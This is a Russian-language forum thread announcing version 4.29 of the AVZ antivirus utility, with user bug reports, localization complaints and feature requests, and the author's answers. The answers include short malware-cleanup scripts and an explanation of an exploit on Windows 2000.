PDA

Просмотр полной версии : AVZ 4.29



Страницы : [1] 2 3

Зайцев Олег
12.12.2007, 13:15
Вышла новая версия антивирусной утилиты AVZ - 4.29. Архив с утилитой содержит базу вирусов от 12.12.2007 138934 сигнатуры, 2 нейропрофиля, 55 микропрограмм лечения, 371 микропрограмма эвристики, 9 микропрограмм ИПУ, 66966 подписей безопасных файлов. Новая версия содержит ряд радикальных доработок и усовершенствований.
Основные модификации:
[+++] Интерфейс на нескольких языках. Локализация интерфейса и протоколов выполняется на основе обновляемых баз, на текущий момент поддерживается русский и английский язык, выбор языка производится автоматически или вручную при помощи параметра командной строки Lang или профиля локализации
[+++] Новая подсистема - мастер поиска и устранения проблем. Осуществляет автоматический поиск проблем и их автоматическое устранение с функцией резервного копирования и возможностью отмены большинства изменений. Поиск системных проблем и ошибок включен в основную процедуру проверки, результаты выводятся в протокол, раздел номер 9. Одна из функций мастера - чистка приватных данных (протоколы, кукизы, разнообразная история и статистика). Мастер использует обновляемую базу.
[++] Расширен HTML протокол исследования, в частности добавлена таблица заподозренных файлов без повторов, добавлены интерактивные элементы для генерации команд - удаление процесса, удаление BHO, управление службами и драйверами
[++] Скриптовой язык - введены новые команды (в частности, DeleteFileMask для удаления файлов, API для анализа XML базы с результатами исследования системы, вызов исследования системы с детальной настройкой параметров)
[++] Расширен набор информации, выводимой в XML протокол
[+] Открытие ключей реестра из скриптов производится в режиме "Только чтение"
[-] Исправления в XML файле (было дублирование имени тегов для двух разных менеджеров)

Страница загрузки как обычно - http://www.z-oleg.com/secur/avz/download.php

PS: Согласно уже установившейся традиции версии нумеруются через одну (т.е. четный суб-номер у приватной версии для альфа-тестеров, нечетный - у публичной).

Surfer
12.12.2007, 17:46
А с ADS-малварами ничего нового ?

Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать :D

Kuzz
12.12.2007, 17:48
Часовой пояс GMT +2, время: 16:42.
Ошибка 503 ...
Вероятнее всего, превышен лимит подключений
;) Показатель востребованности у народа.

Добавлено через 55 секунд

Surfer опередил)

SuperBrat
12.12.2007, 17:52
AVZ 4.29 не может установить свой драйвер AVZPM или удалить прежний, если его не удалить в прежней версии AVZ.

Добавлено через 2 минуты


Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать :D
Скачать 1 (http://www.shareonall.com/avz4_kzcf.zip) Скачать 2 (http://delux.ifolder.ru/4531016)

Mad Scientist
12.12.2007, 17:56
Мастер поиска и устранения проблем- я заблокировал в политики групп изменение стратовой страницы в IE т.к. к-то аутораны с CD дисков их меняли.
Против них это не помогло (всеравно хоть изменение стартовой страницы теперь недоступно этот autorun.exe ее меняет)

Мастер поиска и устранения проблем
"Системные проблемы" или "настройки и твики броузера"
находит
"Internet Explorer - заблокирована настройка домашней страницы"
Выбираю исправить - выделяю -> исправить отмеченные проблемы => успешно исправлены
При повторном поиске "Internet Explorer - заблокирована настройка домашней страницы" опять появляется, стартовая страница IE как была так и осталась заблокированной.

Geser
12.12.2007, 18:38
А с ADS-малварами ничего нового ?

Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать :D

Кому удобнее брать с рапиды http://rapidshare.com/files/76077085/avz4.zip

NickGolovko
12.12.2007, 19:00
Олег,

что делать со справкой? Теперь у англоязычных юзеров вообще ничего не осталось для понимания утилиты. Я сейчас буду объявлять о билде на Geeks To Go - они меня упрашивали прийти рассказать о продукте, потому что даже с той справкой они не в состоянии были многое понять. Теперь англоязычных материалов, к примеру, по скриптам вообще не существует в природе. Вы б хотя бы включили английский хелп в архив под названием avzeng.hlp - и то было бы проще.

Ну и, естественно, меня совершенно не радует тот факт, что часть новых компонентов локализации почему-то по-прежнему проходит мимо меня. На том же Geeks To Go я говорю, что являюсь переводчиком утилиты, что вряд ли можно назвать ложью. Соответственно на меня автоматически ложится ответственность за то, чего я, собственно, не переводил. От ряда фраз я, честно, задумчиво зеленею. Ладно Search for disk files, хотя я несколько раз правил локализацию и в целях единообразия с двумя другими search'aми писал File Search. Но что такое Calk file MD5 hash? Слово calk - специально лезу в 1500-страничный словарь - означает "подковывать". Иногда еще "смолить" и "калькировать". Откуда оно у вас? Я понимаю, хотелось сказать calculate или compute, не хотелось или не успелось побеспокоить меня относительно одной фразы. Но люди-то думают, что переводил я, и делают выводы о моей компетенции.

В логе нашел:

Thaw-maut end of services is outside of admissible values

Я не переводил такого... У меня мозг заклинивает при попытке понять, что имелось в виду.
Смотрю русский вариант.

Таймаут завершения служб находится за пределами допустимых значений

Это переводил ПРОМТ?

Откуда-то вновь всплыло старое название первого стандартного скрипта. Тоже не понимаю... я вроде исправлял...

Я не пытаюсь придраться, но, как уже сказано выше, время от времени всплывают такие огрехи, которые мешают продвигать продукт за рубежом.

Что касается собственно функционала, то, безусловно, сделано несколько важных шагов вперед; по крайней мере, у англичан есть теперь последняя версия движка утилиты.

Muffler
12.12.2007, 19:09
Кстати неплохо бы сделать меню или диалог вибора языка, который бы добавлял нужный .loc файл.

Nick222
12.12.2007, 19:20
У меня плагин для Бата с новым АВЗ почему-то пишет:


Настройки загружены. Путь к AV базам: "C:\Program Files\avz4\BASE\"
Загрузка AV базы. Путь к базе = "C:\Program Files\avz4\BASE\"
Ошибка загрузки баз. Дополнительная информация:

И всё...
Хотя упомянутая директория существует и там есть база.
Может большие буквы отличаются от маленьких?

RiC
12.12.2007, 19:34
Небольшое замечания - свежий UPX с ключем --brute упаковывает AVZ.exe на 10% лучше что слегка уменьшит дистрибутив.

Добавлено через 1 минуту


У меня плагин для Бата с новым АВЗ почему-то пишет:
Может большие буквы отличаются от маленьких?
В новой версии новый формат баз, возможно из-за этого.

Зайцев Олег
12.12.2007, 19:47
Небольшое замечания - свежий UPX с ключем --brute упаковывает AVZ.exe на 10% лучше что слегка уменьшит дистрибутив.

Добавлено через 1 минуту


В новой версии новый формат баз, возможно из-за этого.
новую версию так и запакую (сборку дистрибутива делает автоматика, там вызывается какой-то UPX, я даже версию его не помню ...
Насчет плагина - да, он работать не будет, нужно качать новый плагин и заменять им старый (на страничке загрузки я про это написал).

Добавлено через 51 секунду


Кстати неплохо бы сделать меню или диалог вибора языка, который бы добавлял нужный .loc файл.
В меню это сделать нельзя - ядро начинает использовать локализацию с момента инициализации, поэтому налету поменять язык сложно.

Добавлено через 4 минуты


Олег,
что делать со справкой?
....
Ну и, естественно, меня совершенно не радует тот факт, что часть новых компонентов локализации почему-то по-прежнему проходит мимо меня.
...
Что касается собственно функционала, то, безусловно, сделано несколько важных шагов вперед; по крайней мере, у англичан есть теперь последняя версия движка утилиты.
База там здоровенная, я поэтому и выкладывал альфу, чтобы отловить все ляпы. Я завтра я пришлю базы локализатора на выверку, кое что там действительно добавлялось "на коленке" ... но это не проблема - база локализации обновляется вместе с сигнатурной, а через недельку выйдет 4.29.xxxx - исправленный и доработанный билд 4.29. заодно и хелп английский туда поместим

Добавлено через 1 минуту


Мастер поиска и устранения проблем- я заблокировал в политики групп изменение стратовой страницы в IE т.к. к-то аутораны с CD дисков их меняли.
Против них это не помогло (всеравно хоть изменение стартовой страницы теперь недоступно этот autorun.exe ее меняет)

Мастер поиска и устранения проблем
"Системные проблемы" или "настройки и твики броузера"
находит
"Internet Explorer - заблокирована настройка домашней страницы"
Выбираю исправить - выделяю -> исправить отмеченные проблемы => успешно исправлены
При повторном поиске "Internet Explorer - заблокирована настройка домашней страницы" опять появляется, стартовая страница IE как была так и осталась заблокированной.
Политика в HKLM или HKCU прописана ? Визард в HKCU проверял и фиксил, HKLM не трогал. Я ввел контроль HKLM в этой проверке, завтра в апдейт он попадет

Добавлено через 2 минуты


А с ADS-малварами ничего нового ?

Зеркало бы не помешало, 503 сейчас выдаёт, наверно китайцы ринулись качать :D
ADS вроде фиксил, если недофиксил - в сборке 4.29.xxxx точно добью. Сайт действительно временами залипает, народу много набежало за релизом :)

SuperBrat
12.12.2007, 20:04
Насчет плагина - да, он работать не будет, нужно качать новый плагин и заменять им старый (на страничке загрузки я про это написал).
Я качал недавно, там прежняя версия плагина и редактор тоже старый.

Jef239
13.12.2007, 02:55
AVZ 4.29 не может установить свой драйвер AVZPM или удалить прежний, если его не удалить в прежней версии AVZ.
Олег, а нельзя это зафиксить? Ну повезло мне, что старую версию AVZ не удалил. Но что сейчас, к юзерам ещё на всякий случай возить с собой старый AVZ?
А у юзеров интернет может быть и модемный....

Олег, хоть на сайте напиши крупными буквами, что нужно удалять старый драйвер перед установкой новой AVZ.

Кстати, скажи имя драйвера, чтобы можно было его руками из реестра вычистить.

Добавлено через 27 минут



Мастер поиска и устранения проблем
"Системные проблемы" или "настройки и твики броузера"
находит
"Internet Explorer - заблокирована настройка домашней страницы"
Выбираю исправить - выделяю -> исправить отмеченные проблемы => успешно исправлены
При повторном поиске "Internet Explorer - заблокирована настройка домашней страницы" опять появляется, стартовая страница IE как была так и осталась заблокированной.
Аналогичная проблема с ошибкой "Таймаут завершения служб находится за пределами допустимых значений". Тоже не устраняется.

Добавлено через 5 минут



Политика в HKLM или HKCU прописана ? Визард в HKCU проверял и фиксил, HKLM не трогал. Я ввел контроль HKLM в этой проверке, завтра в апдейт он попадет


А может тем же путём и проблема с "Таймаут завершения служб находится за пределами допустимых значений" пофиксится? Кстати, а нельзя как-то (в хинтах, логе или где) показывать путь в реестре к изменяемому ключу?
Потому как мне путь к рестру даст возможность поискать в инете, что это за проблема и надо ли лично мне её фиксить. А вот название ни о чём не говорит.

Добавлено через 46 минут

F:\Jef\Misc\Foto\Женька_фото.rar - PE файл с нестандартным расширением(степень опасности 5%)

Гм, а сложно научить AVZ понимать автораспаковываемые RAR и ZIP архивы? То ест сообщение верное, но я бы добавил, что это автораспаковываемый RAR-архив.

AStr
13.12.2007, 08:44
W2k/sp4 rus
Стандартные скрипты - №2
После выдачи сообщения:
Проверка завершена
Просканировано файлов: 293, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
Сканирование завершено в 13.12.2007 8:40:54
Сканирование длилось 00:00:33
Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
то Вы можете обратиться в конференцию - http://virusinfo.info

Окно с ошибкой: Invalid variant type

Логи не создаются

Зайцев Олег
13.12.2007, 08:48
Имя драйвера уникально для каждого ПК, поэтому есть скрипт для удаления всех драйверов:
begin
ExecuteStdScr(6);
end.
Этот скрипт можно вызвать из меню "Файл/Стандартные скрипты", номер 6. Этот скрипт зачистит все "хвосты" от текущей или предыдущей версии AVZ.
С таймаутом завершения служб сейчас разберусь (путь в реестре показать невозможно, т.к. скрипт с GUI взаимодействует только на уровне "проискать проблему", "пофиксить проблему", "откатить изменения".
С архивами - AVZ распознает SFX архив и проверяет его, но у него есть две независимых проверки. Одна поймет, что это архив - и проверит его. А вторая поймет, что EXE файлу по непонятной причине дано расширения RAR - и напишет об этом в логе

Jef239
13.12.2007, 09:37
Имя драйвера уникально для каждого ПК, поэтому есть скрипт для удаления всех драйверов:
begin
ExecuteStdScr(6);
end.
Этот скрипт можно вызвать из меню "Файл/Стандартные скрипты", номер 6. Этот скрипт зачистит все "хвосты" от текущей или предыдущей версии AVZ.
Олег, отпиши http://www.z-oleg.com/secur/avz/download.php что это НУЖНО сделать при установке новой версии поверх предыдущей.

С таймаутом завершения служб сейчас разберусь (путь в реестре показать невозможно, т.к. скрипт с GUI взаимодействует только на уровне "проискать проблему", "пофиксить проблему", "откатить изменения".
Есть ещё одно взаимодействие - на уровне "Название проблемы". Вот там (или в хелпе) хотелось бы иметь информацию о проверяемых ключах. Гм, а в лог у тебя сам скрипт не пишет? Просто ещё лучший канал для взаимодействия - это запись в лог.

С архивами - AVZ распознает SFX архив и проверяет его, но у него есть две независимых проверки. Одна поймет, что это архив - и проверит его. А вторая поймет, что EXE файлу по непонятной причине дано расширения RAR - и напишет об этом в логе
А вторая проверка не может взять информацию от первой?

>> Опасно ! Обнаружена маскировка процессов
1.2 Поиск перехватчиков API, работающих в KernelMode
Ошибка в работе антируткита [Failed to set data for 'DisplayName'], шаг [14]

Это я запустил нейратлизацию перехватов в UserMode. А без него - всё работает:

Проверено функций: 248, перехвачено: 34, восстановлено: 0
1.3 Проверка IDT и SYSENTER
Анализ для процессора 1
Проверка IDT и SYSENTER завершена
1.4 Поиск маскировки процессов и драйверов
Поиск маскировки процессов и драйверов завершен


Добавлено через 2 минуты


W2k/sp4 rus
Стандартные скрипты - №2
После выдачи сообщения:
Проверка завершена
Просканировано файлов: 293, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
Сканирование завершено в 13.12.2007 8:40:54
Сканирование длилось 00:00:33
Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
то Вы можете обратиться в конференцию - http://virusinfo.info

Окно с ошибкой: Invalid variant type

Логи не создаются

ПОДТВЕРЖДАЮ. Тоже W2k/sp4 rus

santy
13.12.2007, 10:00
Олег, добрый день. Второй раз сталкиваюсь с ситуацией когда скрипт отложенного удаления с включенным AVzGuard и антируткитом не срабатывает при удалении ntos.exe. Возможно, потому что прописаны атрибуты файла: для чтения. В первый раз проблема решилась изменением имени ntos.exe_ в строке реестра... в этот раз не помогло, запись ntos.exe восстанавливалась ...ntos.exe_, ...ntos.exe и т.д. удалить ntos.exe возможно было только: включив AVZGuard, в regedit убрать в реестре загрузку ntos.exe. После перезагрузки с включенным AVZGuard ntos.exe становится виден в system32 с атрибутом для чтения.

Зайцев Олег
13.12.2007, 10:12
Олег, добрый день. Второй раз сталкиваюсь с ситуацией когда скрипт отложенного удаления с включенным AVzGuard и антируткитом не срабатывает при удалении ntos.exe. Возможно, потому что прописаны атрибуты файла: для чтения. В первый раз проблема решилась изменением имени ntos.exe_ в строке реестра... в этот раз не помогло, запись ntos.exe восстанавливалась ...ntos.exe_, ...ntos.exe и т.д. удалить ntos.exe возможно было только: включив AVZGuard, в regedit убрать в реестре загрузку ntos.exe. После перезагрузки с включенным AVZGuard ntos.exe становится виден в system32 с атрибутом для чтения.
1. В AVZ 4.29 есть фича убивания процесса (есть в HTML логе)
2. Для удаления ntos.exe следует применять BootCleaner, а не отложенное удаление

Nick222
13.12.2007, 11:26
Олег, огромное спасибо за новую версию! :)

Наконец скачал плагин для Бата.
Единственная просьба - нельзя ли внутри в плагине поставить текущий номер версии, а то на сайте написано 4.29, а внутри в инфе плагина всё ещё 4.23 :)

Спасибо ещё раз!

Ego1st
13.12.2007, 11:27
2. Для удаления ntos.exe следует применять BootCleaner, а не отложенное удаление

на 4.27 не срабатывал BootCleaner при удалении ntos.exe проверял на 3 машинах..

Макcим
13.12.2007, 11:31
По порядку:
1. В логе не хватает команды "Карантин через BC"
2. В логе команды располагаются не логично, т.е. пример служба iPod Service. При нажатии Стоп, Удалить, Отключить генерируется следущий скрипт
begin
DeleteService('iPod Service');
SetServiceStart('iPod Service', 4);
StopService('iPod Service');
end.Во-первых лучше выполнять такие действия через BC, во-вторых порядок не правильный.
3. AVZ - Файл - Стандартные скрипты - №4, добавить сбор не запущенных служб и драйверов. Иначе хелперы быстро устанут читать километровые логи.

Ego1st
13.12.2007, 11:37
Олег хотелось бы услышать ответ на вот этот вопрос..
http://virusinfo.info/showpost.php?p=147063&postcount=276
это у меня кривые руки или в базах непорядок был..

Geser
13.12.2007, 11:40
По порядку:
1. В логе не хватает команды "Карантин через BC"
2. В логе команды располагаются не логично, т.е. пример служба iPod Service. При нажатии Стоп, Удалить, Отключить генерируется следущий скрипт
begin
DeleteService('iPod Service');
SetServiceStart('iPod Service', 4);
StopService('iPod Service');
end.Во-первых лучше выполнять такие действия через BC, во-вторых порядок не правильный.
3. AVZ - Файл - Стандартные скрипты - №4, добавить сбор не запущенных служб и драйверов. Иначе хелперы быстро устанут читать километровые логи.
Я думаю эти команды не должны использоваться вместе. Просто при команде удаления АВЗ должен останавливать сервис, а потом удалять.

Макcим
13.12.2007, 11:54
Я думаю эти команды не должны использоваться вместе. Просто при команде удаления АВЗ должен останавливать сервис, а потом удалять.Практика показывает, что при использовании вначале остановки\выгрузки службы\драйвера лучше удаляется. Я не могу доказать свою правоту, но на практике я часто это наблюдаю. Тоже касается удаление через BC, Олег говорит, что нет разницы между скриптами, но последний работает эффективнее
begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
DeleteFile('C:\WINDOWS\Temp\startdrv.exe');
BC_ImportDeletedList;
BC_Activate;
RebootWindows(true);
end.


begin
BC_DeleteFile('C:\WINDOWS\Temp\startdrv.exe');
BC_Activate;
RebootWindows(true);
end.

drongo
13.12.2007, 11:59
В логах добавить кнопочку удаления для DPF , аналогично той что добавили для BHO ;)
O16 - DPF: {11111111-1111-1111-1111-222222222222} -

Также добавить, если сам файл отсутствует в компьютере -> (file missing) Это организовано в hijack this, очень удобно.

tar
13.12.2007, 13:35
какая-то ерунда с ревизором.
Например:
$AVZ0288
$AVZ0072 13.12.2007 8:57:59
$AVZ0249
$AVZ0121
c:\windows\123.exe = $AVZ1124
$AVZ1046

Bratez
13.12.2007, 15:21
...Во-первых лучше выполнять такие действия через BC, во-вторых порядок не правильный...
Я бы сказал больше: вместо этих трех команд хотелось бы видеть две другие, а именно BC_QrSvc и BC_DeleteSvc, т.к. в основном именно они применяются хелперами.

Зайцев Олег
13.12.2007, 15:46
Вышла обновленная версия 4.29.0.9, путь загрузки прежний. Изменения:
* Исправлен баг с выводом в лог сообщений ревизора
* Исправлена ошибка в работе визардов - исправление проблемы не отрабатывало как положено
* В HTML лог добавлен интерактив для генерации строк скрипта, удаляющих DPF

Geser
13.12.2007, 16:15
Если кому нужно на рапиде http://rapidshare.com/files/76278583/avz429.zip

drongo
13.12.2007, 16:22
Я бы сказал больше: вместо этих трех команд хотелось бы видеть две другие, а именно BC_QrSvc и BC_DeleteSvc, т.к. в основном именно они применяются хелперами.


Верно, очень не хватает.
:rolleyes:

Зайцев Олег
13.12.2007, 16:28
Если кому нужно на рапиде http://rapidshare.com/files/76278583/avz429.zip
Я поместил линк на рапиду на странице загрузки, но приходится его постоянно обновлять - перезагрузки файла там не предумострено, а URL на каждую загрузку меняется

Добавлено через 2 минуты


Верно, очень не хватает.
:rolleyes:
Не хватает - приделаю. Тем более что релиз однозначно обновится, когда NickGolovko выверит перевод.

Geser
13.12.2007, 16:49
Я поместил линк на рапиду на странице загрузки, но приходится его постоянно обновлять - перезагрузки файла там не предумострено, а URL на каждую загрузку меняется



Так даже лучше. Нет проблем с кешированием. Кстати, у меня с .ру не всегда качается. Так что лучше делать две копии. Одну на ру вторую на ком

drongo
13.12.2007, 16:50
Говоря о переводе...До сих пор написано File-> "Cleat the log" - Что это за "Cleat" остаётся загадкой...Должно быть Clear
Страница с объяснениями на русском про скрипты- умерла смертью храбрых, нужно вернуть и также на английский перевести .
версия английского генератора скриптов была бы полезна ;)

Jef239
13.12.2007, 17:22
Вышла обновленная версия 4.29.0.9, путь загрузки прежний. Изменения:
Баг с Invalid Variant Type - в полный рост. Мне из-за этого для раздела "помогите" лог не собрать.

Потому как сам не понимаю, как вирус проникает. То есть картинка такая. CMD.EXE запускает FTP.EXE, тот хочет скачать зверя по иени NOTEPAD.EXE. FTP.EXE файрволл притормозил. Но кто запустил CMD.EXE - не понимаю.

Пока пара FTP.EXE болтается в приторможённом состоянии.

Макcим
13.12.2007, 17:57
Так будет "Карантин через BC" и правильное расположение команд в поле для генерации скрипта?

Зайцев Олег
13.12.2007, 18:09
Баг с Invalid Variant Type - в полный рост. Мне из-за этого для раздела "помогите" лог не собрать.

Потому как сам не понимаю, как вирус проникает. То есть картинка такая. CMD.EXE запускает FTP.EXE, тот хочет скачать зверя по иени NOTEPAD.EXE. FTP.EXE файрволл притормозил. Но кто запустил CMD.EXE - не понимаю.

Пока пара FTP.EXE болтается в приторможённом состоянии.
А кто Firewall в данном случае - не Outpost посленей версии грешным делом ?

Добавлено через 1 минуту


Так будет "Карантин через BC" и правильное расположение команд в поле для генерации скрипта?
Команды я переставлю, про карантин BC подумаю - вероятность его включения невелика. Дело в том, что обычный карантин не карантинит чистые файлы, BC карантинит все, что ему покажут.

Макcим
13.12.2007, 18:12
Команды я переставлю, про карантин BC подумаю - вероятность его включения невелика. Дело в том, что обычный карантин не карантинит чистые файлы, BC карантинит все, что ему покажут.Карантин чистых файлов - это не опасно, удаление куда страшнее.

Jef239
13.12.2007, 18:13
А кто Firewall в данном случае - не Outpost посленей версии грешным делом ?
Outpost. Только не последней (шестой), а четвёртой. А что, есть трояны, которые именно через него работают?

Зайцев Олег
13.12.2007, 18:18
Outpost. Только не последней (шестой), а четвёртой. А что, есть трояны, которые именно через него работают?
Ну, трояны и outpost я немментировать не буду (так как не этично), но дам подсказку - запуск TFT/TFTP скорее всего следствие эксплоита, следовательно или outpost по непонятной причине пропускает пакеты с эксплоитом на компьютер (нарушена его работа, правила корявые и т.п.), или он вообще толком не работает (правила, повреждение трояном).

tar
13.12.2007, 19:28
теперь ревизор совсем накрылся - не проверяет файлы по таблицам

Макcим
13.12.2007, 20:57
3. AVZ - Файл - Стандартные скрипты - №4, добавить сбор не запущенных служб и драйверов. Иначе хелперы быстро устанут читать километровые логи.А это будет реализовано или нет?

Зайцев Олег
13.12.2007, 22:58
А это будет реализовано или нет?
А что, оно не работает сейчас ? Вроде как должно ... по крайней мере в логи исследования информация о них пишется, эжто проверено. Про скрипт сбора файлов вроде речь не шла, когда обсуждали доработки

Макcим
13.12.2007, 23:02
Должно быть Вы просто не заметили моё сообщение. Сейчас скрипт собирает только запущенные драйвера.

Jef239
14.12.2007, 00:04
Ну, трояны и outpost я немментировать не буду (так как не этично),
Этично - я и там бета-тестер. :)


но дам подсказку - запуск TFT/TFTP скорее всего следствие эксплоита, следовательно или outpost по непонятной причине пропускает пакеты с эксплоитом на компьютер (нарушена его работа, правила корявые и т.п.), или он вообще толком не работает (правила, повреждение трояном).
Это понятно, и я даже нашёл в чём дело. Как ни стрнно, в доверенных был FireFox. Дети, что-ли его туда загнали. У меня и впрямь половина функций на файрволе отключена.

Мне другое непонятно:
1) Через какую дырку входит эксплойт.
2) Почему AVZ не видит, что эксплойт работает.
3) И может ли AVZ выявлять зловреда на стадии его внедрения в систему.
4) Ну и главное. Нет ли спрособа заделать эту дырку.

Да, все последние патчи, что MS, что FireFox разумеется поставлены.

LoMo
14.12.2007, 04:40
Доброго времени суток !

Скачал новую AVZ 2.29 проверил и мне выдало :

9. Мастер поиска и устранения проблем
>> Таймаут завершения служб находится за пределами допустимых значений

Этот как понять? если это вредно/опасно то можно уменьшить его как то ? если да то где...

Заранее благодарен.

Mad Scientist
14.12.2007, 07:34
теперь ревизор совсем накрылся - не проверяет файлы по таблицам
Подтверждаю, ревизор накрылся, и у типа файлов для ревизора(frz) стоит странное название: "$avz1129" но это мелочи

Зайцев Олег
14.12.2007, 09:01
Этично - я и там бета-тестер. :)


Это понятно, и я даже нашёл в чём дело. Как ни стрнно, в доверенных был FireFox. Дети, что-ли его туда загнали. У меня и впрямь половина функций на файрволе отключена.

Мне другое непонятно:
1) Через какую дырку входит эксплойт.
2) Почему AVZ не видит, что эксплойт работает.
3) И может ли AVZ выявлять зловреда на стадии его внедрения в систему.
4) Ну и главное. Нет ли спрособа заделать эту дырку.

Да, все последние патчи, что MS, что FireFox разумеется поставлены.
Могу угадать - система W2K, последние обновления стоят ? Знаю такое дело, это неизлечимо - нужно XP ставить. Дело в том, что в W2K есть уязвимости, до сих пор не закрытые обновлениями. И есть размножающийся по сети зловред - из семейства RBOT, который эти уязвимости эксплуатирует. Т.е. если он гуляет в локальной сети, то спасения от него нет (кроме как убрать протоколы MS (общий доступ к файлам и принтерам и клиент для сети MS), оставив в настройках сетевого соединения только TCP/IP).
1. См. выше
2. А он и не увидит. Эксплоит - это же 20-30 байт кода где-то в памяти легитимного процесса (подробно описывать долго - есть хорошая книжка Криса Касперски, там даже пример есть эксплоита и демонстрания его работы).
3. Нет. Это обязанность Firewall - прибить пакет с эксплоитом, выявив его по сигнатурам. Или проактивки - обнаружить ненормальное поведение системного процесса и вовремя блокировать
4. Установить XP или отключиться от сети MS. Есть конечно путь временной защиты - переименовать ftp.exe (ftp://ftp.exe) и tftp.exe в что-то там типа _ftp.exe и _tftp.exe

Tarik
14.12.2007, 14:36
Скачал новую версию, обновился, но она на англ. языке. Как мне переключится на русский? Скажите пожалуйста, мне надо сделать лог virusinfo_syscure.zip для раздела "Помогите"

Зайцев Олег
14.12.2007, 14:50
Скачал новую версию, обновился, но она на англ. языке. Как мне переключится на русский? Скажите пожалуйста, мне надо сделать лог virusinfo_syscure.zip для раздела "Помогите"
А операционка какая ? Русскоязычная или нет ? Если русский язык не включается, то в системе по умолчанию стоит локаль, отличная от русской. Можно попробовать запустить avz.exe lang=ru - это принудительно включит русский интерфейс, но не факт, что он будет читабельным.

Tarik
14.12.2007, 14:54
А операционка какая ? Русскоязычная или нет ? Если русский язык не включается, то в системе по умолчанию стоит локаль, отличная от русской. Можно попробовать запустить avz.exe lang=ru - это принудительно включит русский интерфейс, но не факт, что он будет читабельным.
ОС русскоязычная XP SP2 с последними заплатками
А как запустить avz.exe lang=ru? Просто переименовать екзешник?

Переименовал, все по-старому

Jef239
14.12.2007, 15:08
Могу угадать - система W2K, последние обновления стоят ?
Угу. W2K, и всё обновлено.

Знаю такое дело, это неизлечимо - нужно XP ставить. Дело в том, что в W2K есть уязвимости, до сих пор не закрытые обновлениями.
О!!!!! Спасибо за информацию. Первый разумный довод в пользу установки XP, кстати. Просто есть хорошее правило - не ставить новую ОС до выхода SP3. Потому и сижу на W2K.


3. Нет. Это обязанность Firewall - прибить пакет с эксплоитом, выявив его по сигнатурам. Или проактивки - обнаружить ненормальное поведение системного процесса и вовремя блокировать
И тем не менее, есть две вещи, которые были бы ОЧЕНЬ полезны в данной ситуации.
1) Просмотр родителя процесса. (смотрел утилитой pslist от Русиновича)
2) Просмотр командной строки, с которой запущен процесс.
При помощи первой я понял, через кого внедряется эксплойт и закрыл приложение от сети получше. А вторая полезна, чтобы отличить "зловредный" CMD.EXE от нормального.

Олег, если не трудно, впиши в список пожеланий?


4. Установить XP или отключиться от сети MS.
Сети MS у меня нет. Я же дома работаю. А внедрялся он похоже через SQLServer. По крайней мере дерево запуска было такое - SQLServer-CMD-FTP. Пока прикрыл его FireWallом получше. Не поможет - врублю проактивку и впрямь XP поставлю.

Добавлено через 3 минуты


А как запустить avz.exe lang=ru?
:megalol::megalol::megalol:
Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - avz.exe lang=ru
Ну и запускай его вместо AVZ


Переименовал, все по-старому
Теперь обратно переименовывай.

Добавлено через 1 минуту

P.S. "Сети MS у меня нет" читать как давно отключен и доступ к файлам и доступ к принтерам. На уровне свойств сетейвой карты отключен.

Tarik
14.12.2007, 15:20
:megalol::megalol::megalol:
Создай командный файл CMEРТ_OT_CMEXA.CMD.
Впиши туда одну строчку - avz.exe lang=ru
Ну и запускай его вместо AVZ
Как создать командный файл? Извини, что туплю, не шарю в этих вопросах:blush:

Jef239
14.12.2007, 15:37
Как создать командный файл?
Например в NotePad (блокноте)

Tibet
14.12.2007, 16:02
Здравствуйте, Олег!

AVZ выдал: "таймаут завершения служб находится за пределами допустимых значений" - что это такое и что с ним делать?
Во время работы в Pinnacle 10.8 (загрузка ЦП 100%) было падение напряжения в сети. ПК ушел на перезагрузку, после не видит драйвера сканера, принтера, не видит флешку, хотя драйвера на месте... Переинсталяция устройств не помогла...
Можно с этим справиться?
Спасибо! С уважением, Павел.

Mad Scientist
14.12.2007, 21:45
А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...

Зайцев Олег
14.12.2007, 22:47
А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...
Не знаю - я вроде не переносил ...

Добавлено через 4 минуты


Здравствуйте, Олег!

AVZ выдал: "таймаут завершения служб находится за пределами допустимых значений" - что это такое и что с ним делать?
Во время работы в Pinnacle 10.8 (загрузка ЦП 100%) было падение напряжения в сети. ПК ушел на перезагрузку, после не видит драйвера сканера, принтера, не видит флешку, хотя драйвера на месте... Переинсталяция устройств не помогла...
Можно с этим справиться?
Спасибо! С уважением, Павел.
Таймаут завершения служб находится за пределами допустимых значений - это нужно понимать буквально. Какой-то кривой твикер решил "ускорить" работу системы, предписав таймаут на завершение служб порядка 1 секунды. Многие службы за это время понятное дело завершиться не могут, и при завершении ПК система начинает их принудительно прибивать. Последствия понятное дело непредсказуемы. Лечится из меню "Файл/Мастер поиска и устранения проблем" в AVZ

Макcим
15.12.2007, 09:53
Почему при выполнении скрипта №3 AVZ запрещено настройкой удалять руткиты?

zerocorporated
15.12.2007, 16:46
Как создать командный файл? Извини, что туплю, не шарю в этих вопросах:blush:

В блокнот скопируйте:


avz.exe lang=ru


И при сохранение документа выберете: Тип файлов: все файлы.
Укажите имя файла например avz.cmd или avz.bat

Тут главное чтоб расширение файла было cmd или bat

anton_dr
15.12.2007, 16:46
А почему тема переехала в "Сетевая безопасность для начинающих > Основы сетевой безопасности"?
Хотя модераторам виднее...

Не знаю - я вроде не переносил ...


Видимо, я немножко коряво присоединил одно сообщение :rolleyes:

NickGolovko
15.12.2007, 16:58
Олег, с Geeks To Go пришел первый фичреквест. :) Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).

Зайцев Олег
15.12.2007, 17:12
Олег, с Geeks To Go пришел первый фичреквест. :) Хотят интерактивные элементы для генерации скриптов во всех логах (т.е. не только в исследовании системы, но и в логах, сохраняемых из отдельных диспетчеров).
В теории это возможно, только нужно ли ?! В исследовании системы можно генерировать лог с любым набором данных, сохранение протокола из каждого менеджера - это пережиток старых версий, где не было исследования системы.

HEKTO
